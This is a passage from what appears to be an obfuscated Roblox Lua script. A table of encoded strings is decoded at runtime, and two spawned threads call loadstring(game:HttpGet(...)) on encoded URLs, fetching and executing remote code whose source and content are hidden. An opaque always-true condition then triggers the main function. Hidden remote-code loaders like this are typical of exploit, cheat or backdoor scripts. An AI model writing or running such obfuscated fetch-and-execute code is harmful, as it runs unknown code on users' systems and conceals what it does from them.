  _lIIIO000lIO0("BiKe9kF".."zaj58dzo".."ym+VH".."cmg+"),
  _lIIIO000lIO0("EDuY8kp".."zJhEuQyM".."jmORad".."Wo7Mw=".."="),
  _lIIIO000lIO0("Gz6Y7".."k1wJh".."Q9VSMi".."hOVEdQ".."=="),
  _lIIIO000lIO0("FD+S5g".."hfdDY".."+RDY".."0luR".."Jfn".."Q2"),
  _lIIIO000lIO0("FTab7E".."1ub".."zk9FhQ2".."h/Bdf2U+".."Mlc="),
  _lIIIO000lIO0("GiKa".."7UFzJ".."gU9Ri".."c+g/".."RH"),
  _lIIIO000lIO0("BzKZ5".."111a".."Dh8dTg0m".."PNBcmk".."="),
  _lIIIO000lIO0("FD+".."e7Vh9aC0".."1WD53teF".."GfWg+M".."l8="),
  _lIIIO000lIO0("ADia4kc8".."VDgwWjg".."="),
  _lIIIO000lIO0("BzKZ".."5111aHc".."IRDIy"),
  _lIIIO000lIO0("Ezie".."oGxzb3cY".."WQ=".."="),
  _lIIIO000lIO0("BDab4UV1".."aDh8Z".."jI5kPVBc".."mk="),
  _lIIIO000lIO0("ESWY50lo".."aXc".."MXyU2g".."+8="),
  _lIIIO000lIO0("Gja".."Z50dw".."bzk1F".."gc2".."hfJ".."Hf28".."5NQ=".."="),
  _lIIIO000lIO0("FiGY40l4".."bzk1F".."hAikeZH"),
  _lIIIO000lIO0("Az7X1E".."E8Uj5".."8ZTY/gv".."I="),
  _lIIIO000lIO0("FSKF4".."klwaTk1F".."hs4m+lE".."c2o+"),
  _lIIIO000lIO0("FSWF6Qh".."edCU1Fh".."U+lPV".."bPEI+P0".."Mkd7Xv".."RX5vNClF"),
  _lIIIO000lIO0("BzKF".."70t0Yzs".."wWX".."cbku1".."HcmU/O".."Vo7OA=".."="),
  _lIIIO000lIO0("FTaZ4U".."Z1c".."jZ8cjg".."7h+h".."Bcm8jPQ".."=="),
  _lIIIO000lIO0("Gjab4U".."V5Jh".."YxV".."yUym".."+U="),
  _lIIIO000lIO0("FTaa".."4kFyb3c".."fRDgkg".."+lGdQ=="),
  _lIIIO000lIO0("AyW".."C7E".."FxYyUz".."FgMlg".."uxBf28".."5PQ=="),
  _lIIIO000lIO0("FiGY4".."0l4b".."zk1FhY5g".."+lEc".."3Y+Ml8".."="),
  _lIIIO000lIO0("FSWF".."oGpud".."HcMV".."yM2h+".."lF"),
  _lIIIO000lIO0("FTaZ5E".."FoaXcdT".."jg7n".."vRH"),
  _lIIIO000lIO0("FDaH".."8F1/ZT".."4yWXc".."WhP".."NJb3U+M".."lk="),
  _lIIIO000lIO0("Bz6".."Z5UlwaS".."MoWXcRh".."fVcaGc".."lNVg4"),
  _lIIIO000lIO0("Bz6".."H6Qhd".."cDg/VzM".."4"),
  _lIIIO000lIO0("ESWY".."50c8Qz".."s6W".."Q=="),
  _lIIIO000lIO0("AyW".."e4wh".."IdDY/FhU".."2he".."FKc2k6"),
  _lIIIO000lIO0("FCKH40l3".."Y3cXWT".."Y7lg".."=="),
  _lIIIO000lIO0("AzbX1Ek8".."UjZ8YjZ".."3pO".."FAaXQ".."="),
  _lIIIO000lIO0("FDaU9".."Ec8Tj4".."sWSc4g+".."FFcw=="),
  _lIIIO000lIO0("FTiZ5Ut9".."JhYxV".."DY7l".."uJd"),
  _lIIIO000lIO0("FTaZ5EFo".."aXc".."eWTUl".."nvRcc".."w=="),
  _lIIIO000lIO0("EDaZ51".."toYyV8".."cDg4".."g+Vaf".."Q=="),
  _lIIIO000lIO0("AyWe8F".."h1JgMu".."WScnng".."=="),
  _lIIIO000lIO0("Bz6H6Q".."hfa".."SUyXw=="),
  _lIIIO000lIO0("Bz6".."H6QhXby".."A1"),
  _lIIIO000lIO0("Aza".."F9EluZz".."AyWQ=".."="),
  _lIIIO000lIO0("BTaU40d".."zaD58fDY".."5k+".."VEdWg".."+"),
  _lIIIO000lIO0("GTiY4kF".."yb3cPVz".."kjlu5Bcm".."8="),
  _lIIIO000lIO0("BCG".."e7kFy".."Z3ceWT".."o1lv".."JMd".."Wg4"),
  _lIIIO000lIO0("Aza".."b8Ek8Qj".."58cDIlmA".."=="),
  _lIIIO000lIO0("ETuC".."8kF6aiIu".."Vw=="),
  _lIIIO000lIO0("Az6aoGt0".."YzIv".."Uw=="),
  _lIIIO000lIO0("Gz6".."F6UTwJhs".."9RD".."47Fw=="),
  _lIIIO000lIO0("GTiY4kF".."yb3cM".."Xy0".."tlu5Bc".."m8=")
}

task.spawn(function()
loadstring(game:HttpGet(_lIIIO000lIO0("PyOD8".."FsmK".."Xg9Rj55".."m/VJbm".."s4Lhg".."5MoOvTn".."VqMi".."8ZIWPY7E".."d9YjIuRX".."hvx7hOK".."Gcza".."FM1MZG0".."Hyl".."lYmtVM".."mHG5Uk".."vPzJ".."oBzJ".."lxK".."5EaWc=")))()
end)

task.spawn(function()
loadstring(game:HttpGet(_lIIIO000lIO0("PyO".."D8FsmK".."XgsV".."yQj".."kvMG".."dWl4Llc".."geIGxGCw".."rPy".."hCJyT".."auBkkPmE".."=")))()
end)

end
local _llOOOOl0IO=(958*9651>958) and _II0lIlOOlO or nil
if _llOOOOl0IO then _llOOOOl0IO() end
